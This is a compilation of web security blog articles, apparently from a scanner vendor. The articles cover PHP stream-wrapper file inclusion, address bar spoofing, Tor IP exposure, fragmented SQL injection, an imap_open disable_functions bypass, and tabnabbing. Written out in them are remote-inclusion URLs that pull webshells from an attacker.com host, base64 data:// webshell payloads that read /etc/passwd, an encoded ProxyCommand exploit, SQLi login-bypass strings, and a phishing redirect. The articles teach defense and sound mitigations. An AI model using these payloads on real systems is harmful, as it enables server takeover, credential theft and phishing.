    As seen above, Stream-Context is actually an array. The key value above indicates the wrapper type (in this case HTTP) that’ll be used in the context. Each wrapper has individual context parameters. You can read more about them in the PHP documentation.

    PHP Stream Filters

    We've examined the read and write processes of the streams. The stream wrappers’ main advantage is that data can be modified, changed, or deleted during the read/write process, on the fly.

    PHP provides a few streaming filters. These are, string.toupper, string.tolower, string.rot13, and string.strip_tags. Various custom filters may be used in addition to these.

    We can apply filters on streams using the stream_append_filter function. For example, the filter below will convert all the sentences read to uppercase:

    <?php
       $handle = fopen('file://data.txt','rb');
       stream_filter_append($handle, 'string.toupper');
       while(feof($handle)!==true) {
           echo fgets($handle);
       }
       fclose($handle);

    The information read in data.txt will be displayed on the screen as uppercase.

    You can also use the php://filter wrapper to add filters to streams:

    <?php
       $handle = fopen('php://filter/read=string.toupper/resource=data.txt','rb');

       while(feof($handle)!==true) {
           echo fgets($handle);
       }
       fclose($handle);

    This method will be invoked the moment the streaming starts. Compared to the first example, this method is much more feasible for functions that do not allow filter attachments afterwards, such as file() and fpassthru().

    You may use the filters for encoding (rot13, base64) or file zipping and extracting.

    Besides PHP and predefined wrappers, you may use third-party wrappers like Amazon S3 or Dropbox, and write customized wrappers for specific operations.

    The examples we gave until here were under the Local File Inclusion (LFI) category, which included the files from the target system in the code to extract system’s data.

    Using PHP Wrappers in a Remote File Inclusion Attack

    Besides LFI, it is possible to inject code to the web application remotely. This is called Remote File Inclusion (RFI). You can gain control over the server by executing commands and increase the capabilities of the attack.

    Here’s a sample code snippet:

    <?php
       include($_GET[“go”].”.php”);

    Using this simple but powerful code, you can browse websites with links such as  www.example.com/?go=contact and www.example.com/?go=products.

    However, this code has a fundamental flaw. Let’s assume that there’s a file called malscript.txt in some server far away and the file holds the following code:

    <?php
       phpinfo();

    This is the URL of the file holding the code you see above:: http://www.attacker.com/malscript.txt

    The attacker would then call the following URL in order to load this malicious script.

    www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt
    <?php
       include(“http://www.attacker.com/malscript.txt.php”);

    The .php extension added by the developer shows up in this example as a barrier. In RFI attacks, bypassing this is rather easy.

    This is the URL the attacker would supply: http://www.attacker.com/malscript.txt?q=. And here is the full URL that the attacker needs to visit in order to execute the attack:

    www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt%3Fq%3D
    <?php
       include(“http://www.attacker.com/malscript.txt?q=.php”);

    The .php barrier was bypassed using the “?q=” characters in the attack URL. That was just an example. In many cases, you can just host the file with the appropriate extension. However, this trick is also quite useful for Server Side Request Forgery attacks.

    After this process, sensitive server information will be visible due to the phpinfo() function in the .txt file. The .txt file was injected into the PHP function from the remote server, and the code in the text file was executed as part of the website’s code.

    That was a rather harmless example though, given the fact that we can execute any given PHP command that way. The code in malscript.txt can be modified to do some more damage, instead of reading reading some server information, like so:

    <?php
       system(“uname -a”)

    As you see we can execute system commands with an RFI, which is as bad as it gets. This code would allow the attacker to execute any command they want, by supplying it as GET parameter:

    <?php
       system($_GET[“cmd”]);

    Yet again we have the same script URL as in our previous examples: http://www.attacker.com/malscript.txt?q=. But, this time we can supply a system command as an additional GET parameter with the name CMD:

    www.example.com/?cmd=uname+-a&go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt?q=

    At this point, all sorts of commands can be run by the server per the attacker’s request.

    If the .php extension barrier cannot be overridden using Query String, you can make use of the extension. You need to make a PHP file for this purpose and include the code below before uploading it to your server.

    This is the content of the backdoor.php file:

    <?php
       echo '<?php system($_GET["cmd"]);?>';

    Therefore the new link the attacker needs to supply is: http://www.attacker.com/backdoor. And this is the link the attacker needs to visit in order to execute the attack:

    http://example.com/?cmd=cat%20/etc/passwd&go=http%3A%2F%2Fwww.attacker.com%2Fbackdoor

    PHP will evaluate this code as follows:

    <?php
       include(“http://www.attacker.com/backdoor.php”);

    Bypassing Blacklists with Stream Wrappers

    What if the developer started taking precautions and filtered out some inputs?

    For example, you can no longer use http:// within the parameter. The path to exploit the vulnerability seems to be blocked when this is done. This is where stream wrappers come into play. Instead of using the http:// wrapper that’s been filtered, you may use other options such as the php://input wrapper.

    How can you use the wrapper, which takes the input from the POST Request Body and sends it to the PHP compiler, in exploiting an RFI vulnerability?

    Here is a sample request:

    POST http://www.example.com?go=php://input%00 HTTP/1.1
    Host: example.com
    Content-Length: 30

    <?php system($_GET["cmd"]); ?>

    As seen above, even though the http:// and file:// wrappers were filtered out, the php://input wrapper was used to exploit the vulnerability.

    Even if the developer blacklists the php:// wrapper and the other PHP commands that allows system level command execution (system, cmd), there are still ways to override the barriers. The data:// wrapper may be used in this case. It's job to transmit the input passed to it as type and value, to the PHP stream functions.

    The code above was:

    <?php
     &nbsp; system($_GET[“cmd”]);

    If the data:// wrapper can be used, the attacker can simply use the following code without the need to host an external file:

    data://text/plain, <?php system($_GET["cmd"]);

    This is how the URL encoded version of the final request looks like.

    data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e
    http://www.example.com/?go=data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e

    With the cmd parameter, any code request to be executed will be sent. For example, to get the system information, you can use uname -a but you have to encode it first.

    The URL used to attack:

    http://www.example.com/?cmd=uname+-a&go=data%3a%2f%2ftext%2fplain%2c+<%3fphp+system(%24_GET%5b"cmd"%5d)%3b+%3f>

    We forgot that the developer blacklisted the keywords like system and cmd. What can you do instead?

    Thankfully the data:// wrapper supports base64 and rot13 encoding. Therefore, you have to encode the PHP code you’ll use to exploit the vulnerability in base64 and make the following request:

    PHP code:

    <?php
       system($_GET[“cmd”]);

    This is the base64 encoded version of the exploit. PHP will decode it and execute its contents.

    PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

    The URL you’ll make a request with:

    http://www.example.com/?cmd=uname+-a&go=data://text/plain;base64,PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

    Seems innocent, doesn’t it? Yet the script code under the go parameter, encoded in base64, is ready to execute commands in operating system level using the “cmd” parameter.

    Conclusion

    In this article, we took a look at how wrappers allow the use of a mutual function for different stream operations. These wrappers can also be used to bypass some security filters. As we stated in the examples above, it’s almost impossible to ensure security using blacklists since the attack scope continuously increases. It’s far more effective to whitelist the accepted functions and text inputs instead of blacklisting keywords like http://, file://, php://, system, and cmd, and updating them each time a new attack vector is discovered. Efficiency is key in securing your web applications.

    You can also disable the remote file inclusion functionality and, as always, should never allow user controlled input in functions that allow file inclusions and eventually code execution, such as require, include, require_once, include_once and others.

    Web Browser Address Bar Spoofing

    $
    0
    0

    The Google security team state that the address bar is the most important security indicator in modern browsers. This part of the browser supplies both the true identity of the website and verification that you are on the right website.

    Web Browser Address Bar Spoofing

    Eric Lawrence, the author of Fiddler, an HTTP debugging proxy, has written about this feature on his personal blog. In his article, he gave reasons why web developers couldn’t interfere with anything above the webpage window, sometimes referred to as The Line of Death, and what problems might occur from this lack of involvement. Despite his efforts to raise awareness, two address bar spoofing incidents took place the same year the blog post was published.

    Homograph Vulnerability

    One of the address bar spoofing incidents was the Homograph vulnerability that took place in April 2017. Using the International Domain Name (IDN) feature, which allows domain names to be written in foreign characters, attackers imitate legitimate domains using characters from various alphabets to trick users. This attack is called a Homograph attack.

    For example, the xn--80ak6aa92e.com address would show "аррӏе.com" due to IDN which is virtually indistinguishable from "аpple.com", even though these are totally different letters that just happen to look the same. Don't believe us?

    • Copy this а here
    • Paste it into your browser bar, and press Return
    • Did you receive search results for the letter 'a' of the Latin alphabet or the Cyrillic script?

    However, browser developers took precautions by releasing security patches that prevented this confusing behaviour shortly after the discovery of the vulnerability. One tactic was to convert an IDN address into the ASCII format in the address bar, which managed to prevent malicious activity.

    Address Bar Spoofing in Microsoft Edge and Safari

    The second address bar spoofing incident was discovered by Pakistani researcher Rafay Baloch, who lectures at various conferences, such as Blackhat, on his research about browser security. The address spoofing technique he found affected Microsoft Edge and Safari browsers.

    • While a website redirected its visitor to another website with with a closed port, the attacker could intervene and change the content of the current web page however they liked.
    • Since the URL bar already showed the address of the domain with the closed port , users were led to believe that they were browsing a legitimate site instead of an attacker-controlled one and are convinced to enter their credentials.
    • In his proof-of-concept, before redirecting the user to the website with the closed port, Baloch decoded the base64 encoded version of Gmail login page, and then added it to the DOM. Therefore the address in the URL (http://gmail.com:8080) and the phishing page looked very convincing. Baloch managed to keep the spoofed address stable by using the setinterval() function that tried to redirect the user every 100 seconds.

    The Code Used to Spoof the Web Browser Address Bar

    Baloch used the following code for the aforementioned exploit.

    function spoof()
    {
    var gmail = 'PCFET0NC8+KArOK.........ZHk+PC9odG1sPg=='; // The base64 encoded version of the Gmail page

    x=document.body.innerHTML=atob(gmail);

    document.write("<title>Gmail</title>");
    document.write("x");
    window.location.assign("https://www.Gmail.com:8080");
    }
    setInterval(spoof(),100000);
    </script>

    The proof-of-concept above was the one working on the Microsoft Edge browsers. The latest security update for Microsoft Edge fixed the vulnerability. Baloch's a tweet announced that Apple also fixed the vulnerability with the release of Safari 12. You can read more about his research on the blog post, Apple Safari & Microsoft Edge Browser Address Bar Spoofing - Writeup.

    Conclusion

    The address bar is the main component used by web browsers to navigate the internet. Users enter the website they wish to visit. Web security-conscious users may watch the changes on the address they enter as the page loads. Attackers are aware of this, and therefore invent smart ways to deceive the user, such as the Homograph attacks and the vulnerabilities found by Rafay Baloch. Keeping all software, especially web browsers, up to date is crucial to help prevent similar attacks.

    Exposing the Public IPs of Tor Services Through SSL Certificates

    $
    0
    0

    The Onion Router, also known as Tor, is an internet service that provides anonymous internet surfing to users by bouncing the connection on several relays. By doing this Tor users avoid exposing their IP addresses to the servers they visit. Instead, these servers see only the IP address of one of Tor's exit nodes. But TOR doesn't only protect its users when they visit websites like Google.com or Facebook.com.

    Another option on the Tor network, for users who wish to preserve their anonymity, are the Tor hidden services. They can only be reached using the Tor technology and you can recognize them by their use of the .onion extension. Contrary to popular belief, these websites aren’t only used for shady activity, but also for legitimate purposes. In fact, many websites that you use on a daily basis can also be accessed using a similar, hidden service, in order to serve users who value anonymity. For example, you can access The New York Times through https://www.nytimes3xbfgragh.onion or Facebook through https://facebookcorewwwi.onion, as long as you are currently using Tor.

    Another advantage, for website owners, is that your users cannot find out the real IP of your server. This is a big win for privacy and makes it hard to censor or take down a hidden service. In order to run such a service, besides adjusting a series of settings for Tor, you also need to set up a web server like Apache or Nginx on the machine you’ll host your website on.

    The vulnerability that we discuss, that will allow anyone to find out the real IP of a hidden service, arises due to a misconfiguration in Tor setup.

    Common Mistake in SSL Setup on Tor

    OK, so you’re clearly concerned to maintain anonymity on the internet if you’re using Tor. Let’s assume that you implement TLS/SSL to secure the Tor service. To do so, you have to get the certificate for your website with the .onion extension signed by a certificate authority. Let’s assume that your service URL is examplewwwi.onion. When someone requests the website, the server sends the encryption data and the certificate in the ServerHello response given to the ClientHello request. The Common Name (CN) area in the certificate will state your domain, examplewwwi.onion.

    Let’s say you’re using a web server service such as Apache, Nginx or something similar, and you misconfigure it to listen to all the connections that reach the network interfaces (0.0.0.0), instead of the loopback address (127.0.0.1). This will have a catastrophic impact on your web server's anonymity. Let's look at why in the following section.

    Exposure of the Public IP of the Tor Service You’re Using

    Anyone who tries to reach port 443 from your server’s public, non-Tor IP address will see the certificate and the .onion domain found in the CN, which is in the ServerHello response given to the ClientHello message.

    You might wonder how people can find out your public IP when you’re using Tor.

    What if we assume that attackers followed this method to reach your personal data:

    1. They send a connection request to an IP range (e.g. 75.30.203.1 - 75.30.203.254) through port 443.
    2. They send a ClientHello message.
    3. They extract the CN in the ServerHello message.
    4. They match the IPs with the .onion domains.

    By doing so repeatedly, they are able to access the data of many websites using the Tor network.

    Conclusion

    Ensuring your safety requires attention and keeping an eye on new attack methods. According to recent research by Rosselyn Barroyeta, a misconfiguration can leave you exposed, even when using the most secure service.  She conducted a live demonstration of the impacts misconfiguration may have and how it results in IP address exposure.

    For further information, see IP’s públicas de Tor son expuestas mediante certificados SSL (Spanish).

    Fragmented SQL Injection Attacks – The Solution

    $
    0
    0

    Ask someone how they'd detect whether a SQL Injection vulnerability exists in a web application and they're likely to suggest putting a single quote into a parameter in the application. Then, if they received an error, they could infer the presence of an SQL Injection vulnerability. Don't be surprised if you come across someone defining SQL Injection as Single Quote Injection.

    Fragmented SQL Injection Attacks – The Solution

    In this blog post, we discuss the research on Fragmented SQL Injection where the hackers control two entry points in the same context in order to bypass the authentication form. Let’s take a quick look at the importance of single quotes in SQL injection attacks.

    Single Quotes in SQL Injections

    In a system (command interpreter, file system or database management system, for example), characters that have special meanings are called metacharacters. For instance, in the SQL query context, single and double quotes are used as string delimiters. They are used both at the beginning and the end of a string. This is why when a single or double quote is injected into a query, the query breaks and throws an error. Here’s an example of where the quotes are placed in the query.

    SELECT * FROM users WHERE user_name='USER_INPUT'

    So, when a single quote is injected into the entry point above, the query interpreter will either complain about invalid syntax or report that it can’t find the quote’s pair at end of the string.

    Code:
    $username = "'";
    $query = "SELECT * FROM users WHERE username='".$username."'"

    Result:
    SELECT * FROM users WHERE username='''

    The system will throw an error for the single quote left unpaired at the end of the query. This is only valid for the string context. There is no need to inject single or double quotes into the context below, since the id parameter doesn’t expect a string.

    $query = "SELECT * FROM users WHERE id= " . $user_input;

    In the example above, in order to perform an SQL injection, you have to input a numeric value, and the following values will then be evaluated as part of the SQL command.

    The error returned due to the injection of a single quote may signify that the input from the user was not filtered or sanitized in any way, and that the input contains characters that have special meaning on the database.

    Let’s take a look at an instance where the single quote is blacklisted or escaped from the command.

    $username ="' or 1=1 --";
    $password ="qwerty123456";
    // . . .
    $query = "SELECT * FROM users WHERE username='".$username."' AND password='".$password."'";

    select * from users where username='\' or 1=1 -- ' or password='qwerty123456';

    As you see in this example, because the single quote (‘) is escaped with a backslash, the payload does not work as intended by the hacker.

    Fragmented SQL Injection

    Fragmented SQL Injection (not a term used by its inventor Rodolfo) takes place when two input points are used jointly to bypass the authentication form.

    If hackers can control multiple points, and the values from these points are in the same context, they can use fragmented payloads to circumvent blacklists and character limits with this method.

    We saw in the examples above that a single quote was injected and then escaped with a backslash (\). In a Fragmented SQL injection, if you use the backslash in the first field, and another SQL command that will return 'true' in the second field, you’ll be able to bypass the form. Here’s a demonstration of what happens in the background:

    username: \
    password: or 1 #

    $query = select * from users where username='".$username."' and password='".$password."'";

    select * from users where username='\' or password=' or 1 # ';

    The backslash neutralizes the following single quote. So the value for the username column will end with the single quote that comes right after password= (the end of the gray text). Doing so will eliminate the required password field from the command. Due to the or 1 command, the condition will always return 'true'. The # (hash) will ignore the rest of the function, and you’ll be able to bypass the login control and login form.

    The Inconvenient Solution to SQL Injection Attacks

    Please note that the blog post we referenced in this article suggests using the htmlentities() function in PHP to filter inputs, as a way to prevent the attack we described above. If you set the ENT_QUOTES flag, HTML encoding will convert single quotes, double quotes, and tag opening and closing signs, to their corresponding HTML entities. For example, a double quote would be encoded as '&quot;'.

    However, this not the ideal solution, because there are situations where single or double quotes are not required to fulfill an SQL injection attack. In addition to that, some old school techniques like GBK Encoding can be used to bypass preventions like the addslashes() function in PHP and this weakens the overall prevention mechanism.

    Prepared Statements are the Ideal Way to Prevent SQL Injection Attacks

    At Netsparker, we believe that the correct and proper solution to prevent SQL Injection attacks is to use Prepared Statements, otherwise known as Parameterized Queries.

    Parameterized Queries allow you to separate the structure of the SQL query from its values. All remaining methods to prevent SQL injection attacks may be bypassed in the near future with neat tricks such as that of Chris Shiflett, and are therefore not reliable.

    Implementation of Parameterized Query in PHP and .NET

    In PHP, you can use the Parameterized Query technique as illustrated:

    $stmt = $dbh->prepare("UPDATE users SET email=:new_email WHERE id=:user_id");
    $stmt->bindParam(':new_email', $email);
    $stmt->bindParam(':user_id', $id);

    For .NET applications, you can use it as illustrated:

    string sql = "SELECT * FROM Customers WHERE CustomerId = @CustomerId";
    SqlCommand command = new SqlCommand(sql);
    command.Parameters.Add(new SqlParameter("@CustomerId", System.Data.SqlDbType.Int));
    command.Parameters["@CustomerId"].Value = 1;

    Conclusion

    Developers still use blacklists to prevent the SQL Injection vulnerability. They do this either manually or using functions designed for this purpose (e.g. addslashes). However, we encounter new tactics in information security every day that attempt to bypass these blacklists. Ultimately, the best way to prevent injection based flaws like SQL Injections is to use a Prepared Statement. This is the only effective way developers can teach the system not to evaluate user controlled parameters as part of the query structure.

    Bypass of Disabled System Functions

    $
    0
    0

    Imagine that you discover an Unrestricted File Upload vulnerability and upload a web shell to the server. Or, you have a payload that allows you to execute commands on the system through Local File Inclusion (LFI) or Remote File Inclusion (RFI) vulnerabilities.

    Bypass of Disabled System Functions

    When you execute the command that’s expected to call system functions on the server side, you’re greeted by a surprise warning which states that you’re not allowed to execute the function because it’s disabled.

    www.example.com/shell.php?cmd=whoami

    Warning: system() has been disabled for security reasons in /var/www/html/shell.php on line 6

    The disable_functions directive in the php.ini configuration file allows you to disable certain PHP functions. One of the suggested hardening practices is to disable functions such as system, exec, shell_exec, passthru, by using the disable_functions directive to prevent an attacker from executing system commands. However, a user named Twoster in the Russian Antichat forum announced a new bypass method to this security mechanism. In this blog post, we discuss the technical details of the bypass.

    The Exploit Code of the Bypass

    Last week, Anton Lopanitsyn shared the exploit code on Github after the announcement on the Antichat forum. In the exploit code, it’s clear that the bypass relies on the imap_open() function, which is activated after the installation of the imap extension on PHP.

    <?php
    # CRLF (c)
    # echo '1234567890'>/tmp/test0001

    $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

    imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

    The imap_open() function doesn’t readily exist in the PHP core. It’s a wrapper for imapd, designed by the researchers at the University of Washington. As stated above, PHP will have the imap_open() function defined only after you've installed the IMAP PHP extension. Let’s analyze each component in the exploit code.

    The Parameters of imap_open Function

    We’re going to take a closer look at the mailbox parameter the function takes, to understand how the imap_open function works in the exploit. Here is the syntax of the function:

    resource imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] )

    The value for the mailbox parameter consists of the server name and the mailbox file path on the server. The name INBOX stands for the current user’s personal mailbox. This is how you set the mailbox parameter:

    $mbox = imap_open ("{localhost:993/PROTOCOL/FLAG}INBOX", "user_id", "password");

    Between the brackets, you can see the server name or IP address, the port number (after the colon) and the protocol name. After the protocol name, the user can choose to set a flag as the third parameter.

    The warning in the official documentation of PHP about setting up the imap_open parameters is crucial.

    This warning states that unless enable_insecure_rsh is disabled, the user data should not be directly transmitted to the mailbox parameter.

    This warning states that unless enable_insecure_rsh is disabled, the user data should not be directly transmitted to the mailbox parameter. Let's take a look at  how the IMAP extension works to understand what the enable_insecure_rsh configuration option does, and why the warning prompts users to disable it.

    The IMAP Server Types and SSH Connection

    There are two Unix-based IMAP servers that are widely used. One is imapd, developed by the University of Washington, and the other is the IMAP server developed by Cyrus.

    Cyrus stores the user emails in a built-in database. So, accessing Cyrus is only possible through the IMAP protocol. This is why when Cyrus is in use, there are no connections between user accounts on the Unix system on which the IMAP is installed and the IMAP accounts.

    On the other hand, imapd stores the emails in files owned by the mail users on the Unix system, such as /var/spool/mail. User accounts and access privileges on imapd are directly related to the Unix server. If your mails are stored in a spool file to which you have authorization, you can login through SSH and verify your privileges on the files.

    There’s no need for the entire procedure to establish an IMAP connection when there’s SSH. The imap_open function initially establishes an SSH connection and, if authorized, proceeds without an IMAP connection. This is called the IMAP preauthenticated mode. The warning given for passing the value in the mailbox parameter is based on this. The mailbox value will be passed on to the SSH command as a parameter while setting up an SSH connection.

    Before the secure SSH protocol was widely used, there was a protocol called rsh. However, it's quite insecure by default, doesn't use encryption and shouldn't be used for connections outside (and even inside) the local network. The imap.enable_insecure_rsh configuration option deactivates both rsh and ssh for preauthentication.

    The -oProxyCommand in the Exploit

    One of the many parameters the SSH command uses is the -o parameter, which allows you to set the options available for use during the connection. ProxyCommand is one of the options that can be set right before commencing the SSH connection. For example:

    ssh -oProxyCommand="touch tmp.txt" localhost

    When you execute this command, you’ll realize that the tmp.txt file will be created even if an SSH connection is not made to localhost.

    The -oProxyCommand in the Exploit

    Due to all the components in the exploit code, a system which has functions such as system and passthru disabled will still be vulnerable to executing commands in RFI or LFI vulnerabilities.

    Additional Measures Against the Bypass

    There are two ways to protect yourself against the dangers of the imap PHP extension. The first is by checking for any special characters (such as forward slashes) whenever you pass user input to imap_open, which would prevent a Remote Code Execution vulnerability. We stated above that you can use certain flags within the mailbox parameter. The /norsh flag is one of these and you should set it in order to disable the IMAP preauthenticated mode.

    In addition, an effective defence against the disable_functions bypass is to disable the imap.enable_insecure_rsh option by giving a '0' value in the php.ini file. However, in PHP version 5, this option isn’t available, so you should think twice whether you need the imap extension and whether you should add imap_open to your list of disabled functions.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
    Sven Morgenroth
    Umran Yildirimkaya


    Tabnabbing Protection Bypass

    $
    0
    0

    Since its inception, the Uniform Resource Locator (URL) has been a fundamental part of the World Wide Web. It is easily located in your current browser's address bar.

    If you were not already very familiar with URLs, it would be easy to conclude that they always start with either 'http://' or 'https://', and can't contain sensitive information. Unfortunately, this is not true.

    Tabnabbing Protection Bypass

    In this article, we'll shed light on these apparently insignificant strings, to reveal that they can be bursting with information, and we'll also examine why it's so hard to parse them correctly.

    Tabnabbing Protection Bypass

    Let's first start with a very simple URL example and why it's hard to parse them correctly. One of HackerOne's latest submissions examines a tabnabbing protection bypass for a URL parser. Phabricator is an open source management program that contained a security bug that could be abused by a rather interesting looking URL. Phabricator checks whether links added by users point to an internal resource or to another website. Those pointing to another website are treated with special care, as Phabricator adds an additional security attribute to the link. All other links (that link to internal resources) do not receive this attribute. Links that Phabricator interprets as an internal resource might look like this:

    /\example.com/some-file

    This doesn't look like a typical URL that you'd see in a browser window. So how does this work and why did Phabricator not recognize that it leads to an external website? Let's first look at the href attribute of link tags. In order to create an internal link to your website's blog, for example, your homepage must contain HTML code like this:

    <a href = "/blog/">Our Blog</a>

    This is fairly common. Browsers immediately know that you want to visit the /blog/ endpoint on the same website. However, it's also possible to do something like this:

    <a href = "//example.com/blog/">An external Blog</a>

    This has the potential to cause confusion. Why are there two slashes, where you would expect 'http://' or 'https://'? The answer has to do with mixed content. When you serve your website over HTTPS, you don't want any HTTP links to appear there. In older web browser versions you would risk leaking sensitive data (such as cookies) over HTTP if you included an image. In the newer web browser versions however, the content would simply be blocked and your image would not be displayed. This is obviously a problem.

    Let the Browser Decide Which HTTP Protocol to Use

    So, imagine you want to load the image over HTTP. Your visitors go to http://yourwebsite.com/ which works fine. But once they visit the HTTPS version of your website you run into the problem with mixed content. You'd either have to replace 'http://' with 'https://' on the server side, or use JavaScript to do so. However, modern browsers are able to determine whether you should use 'http://' or 'https://', if you give them the permission to do so; you need only omit 'http:' and 'https:' from the link. What's left is the (two slashes) link mentioned above.

    The problem is, when you compare it to the link to your website's blog, you will see striking similarities – no 'http://', no 'https://', and it begins with a slash.

    However, it's quite common to use the above syntax. It comes as no surprise, then, that the Phabricator developers took precautions and ensured that such links were treated as external links too. However, they neglected the fact that browsers automatically convert a backslash to a forward slash if the URL begins with '/\'. This is where the vulnerability occurred and why Phabricator parsed the URL incorrectly.

    Do You Need an Effective Security Attribute?

    But what was the security attribute about? The HTML attribute that Phabricator omitted on internal links was called noreferrer. Note how it's written differently from the HTTP Referer header. This header is sent by the browser to tell the server which website contained the link that the user clicked. That means that a server can determine whether you came from https://example.com/help or https://www.netsparker.com/blog. While this has its advantages, it also comes with a risk that sensitive information can easily be leaked to the web server. Of course, passwords and session IDs don't belong in URLs, and the referrer is just one of the reasons why this is a dangerous idea. But even if they don't contain a password or a session ID, URLs can still contain information that should not be made available to the visited site.

    Let's consider an example. Imagine a customer uses a helpdesk application to open a ticket that contains a link to an article on their website. Once the employee clicks the link, they automatically send the URL of both the helpdesk application and the link, possibly containing the title of the particular ticket, to the customer.

    Of course, internal helpdesk tickets may sometimes contain titles that shouldn't be shown to customers. One way to prevent the browser from sending a Referer header is via the rel attribute containing the noreferrer value. As explained before, the spelling is different to the HTTP header. The reason for this is that Phillip Hallam-Baker, the computer scientist who made the proposal for the Refererheader, spelt it wrong. Reportedly, the UNIX spellchecker at the time knew neither 'referer' nor 'referrer'. Apart from the fact that this means our browsers send one byte less per request, the spelling of this header also leads to a lot of confusion. If you add rel = "noreferer" to your link tag, it doesn't have any effect.

    So, to recap, when you add rel = "noreferrer" to your link, you prevent the browser from sending a Referer header.

    The Tabnabbing Exploit

    The HackerOne submission mentions the Tabnabbing exploit a few times, which is what both the submitter and the Phabricator developer seem to be most concerned about. But what is Tabnabbing and why does noreferrer prevent it? This is a description on how tabnabbing works.

    Whenever you open a new tab by clicking a link whose HTML code looks like this, JavaScript will keep a reference to the window object of the site that opened the tab:

    <a href = "https://example.com/blog" target = "_blank">Blog</a>

    You are not allowed to read the location of the site that opened the tab, whether the rel = "noreferrer" attribute is set or not. However, what you can do is change the location of the opener by using the following JavaScript code:

    window.opener.location = 'https://attacker.com/phishing';

    The tabnabbing attack would happen as follows:

    1. The victim clicks a link on https://example.com/ containing target = "_blank", which leads to https://attacker.com
    2. https://attacker.com immediately redirects the tab where https://example.com/ is located to https://attacker.com/phishing
    3. The victim looks at the attacker.com page and then goes back to the previous tab containing a phishing page that looks exactly like https://example.com/, but prompts the victim to enter their login details again

    This makes a phishing attack much more effective, because the user is not expecting such behaviour and thinks they are still on the original page ('tabnabbing'). The way to thwart this attack is to use rel = "noopener", though rel = "noreferrer" has the same effect.

    It's interesting how such a small parsing mistake can have such a huge impact on the security of an application. Since we have learned how easy it is to parse URLs incorrectly, let's take a look at how hard URL parsing can actually be.

    How URLs are Structured

    A URL consists of many different parts the client must parse in order to establish a connection to the target server. In fact, URLs are just an easy way for humans to read and create links. Machines have to use a different approach.

    Scheme

    This approach starts with the scheme. This is the missing part of the URL that was problematic for Phabricator. Mostly URLs look like http://example.com or https://example.com. However, there are many more schemes, such as ftp://, gopher:// or netdoc://. Aside from that, browsers can recognise various pseudo-schemes such as javascript: or data:. It is therefore not possible to recognize an external link simply by assuming it begins with 'https://', 'http://', '//' or '/\', even though schemes like gopher:// and netdoc:// aren't available in browsers.

    Hierarchical URL Indicator

    As you might have already observed, external links contain a double slash, either immediately after the scheme or at the beginning. There is a simple difference between an internal and an external link.

    Internal Links

    Let's assume we click one of the following internal links on this website: https://example.com/about/index.html.

    Link TagResulting Absolute URL
    <a href = "/blog">Blog</a>https://example.com/blog
    <a href = "company">Company</a>https://example.com/about/company

    If there is a single slash at the beginning of the URL, the browser will simply replace the current path with the content of the href attribute and open that link. However, if you omit the slash, your browser will append the content of the href attribute to your current folder.

    External Links

    Here is an example of an absolute URL that leads to an external website. This will open https://www.netsparker.com regardless of your URL.

    Link TagResulting Absolute URL
    <a href = "https://www.netsparker.com/">Netsparker</a>https://www.netsparker.com/

    Credentials

    For HTTP Basic authentication, or for authenticating to an FTP server using your web browser and the ftp:// scheme, it is possible to specify username/password combinations. It may look something like this:

    https://username:password@example.com/

    This causes a big problem in the case of URL whitelisting that is not implemented correctly. You can simply use a URL like https://example.com@attacker.com/, which will still lead to attacker.com. However, some URL parsers could interpret it as a link to https://example.com.

    Server (Host)

    The host part of the URL specifies which server the URL points to. This can be a domain like example.com, or an IPv4 or IPv6 IP in different formats, such as 127.0.0.1 or [0: 0: 0: 0: 0: 0: 0: 1]. Although classic IP notation is widely accepted, many clients that were developed using the C programming language also accept IP addresses in octal, decimal or hexadecimal format as shown:

    • http://127.0.0.1
    • http://0x7f.1/
    • http://017700000001/

    All of them point to the localhost. Not only can this be exploited in a client-side attack, but it can also bypass IP blacklists which are designed to protect internal services from Server Side Request Forgery attacks.

    Port

    You can specify the Port in a URL by appending it to the domain name with a leading colon like this:

    http://example.com:8080/

    Most of the time, the value does not have to be specified. It automatically defaults to the standard port of the respective protocol.

    ProtocolDefault Port
    https443
    http80
    ftp21

    As illustrated in the example above, it's also possible to run a server on a non-standard port. This is where the port part of the URL comes into play.

    Path

    The Path in a URL begins with a '/', and originally referred to the folder structure within the webroot. However, with many modern frameworks and REST style URLs, this is no longer always the case.

    The path is not required in order to establish a connection. Instead, it is passed to the web server after the connection has been established and specifies which document the browser wants to retrieve.

    Path Parameter

    It is possible to specify additional parameters in the path. One example is to be found in Java applications, where the JSESSIONID parameter is appended to the URL.

    https://example.com/blog.jsp;JSESSIONID=b92e8649b6cf4886241a3e0825bd36a262b24933

    We have already established earlier why this is not a good idea. In IIS prior to version 6.0, this was the root cause of file upload vulnerabilities. IIS would treat a file such as shell.jsp;img.jpg as having a jsp extension with an additional parameter called img.jpeg, which could easily bypass some blacklists.

    Query

    The query part of a URL is where GET parameters are usually located. It begins with a question mark, and can contain key/value pairs. It might look like something like this:

    https://example.com/blog?action=search&author=Bob

    Fragment

    The fragment part of a URL includes everything that follows after the hash symbol. It is different from all the other URL parts, because everything that follows is not sent to the server, but is accessible by JavaScript through document.location.hash, and is also used for some browser features. Clicking a link like the one below will make the browser scroll to an HTML element with the ID 'help' on the same page, should such an element exist:

    <a href = "#help">Help</a>

    URL Parsing is Highly Complex With Lots of Parts

    I have demonstrated why URL parsing is a highly complex topic. There are lots of different parts to consider, and it's even possible for different libraries to have different methods to parse URLs.

    You can find a few great tricks on how to bypass URL parsers in Michał Zalewski's book, The Tangled Web. One example from the book looks quite complicated, but the information provided above makes it easier to understand. The URL looks like this. Can you guess where this link points to?

    http://example.com&gibberish=1234@167772161/

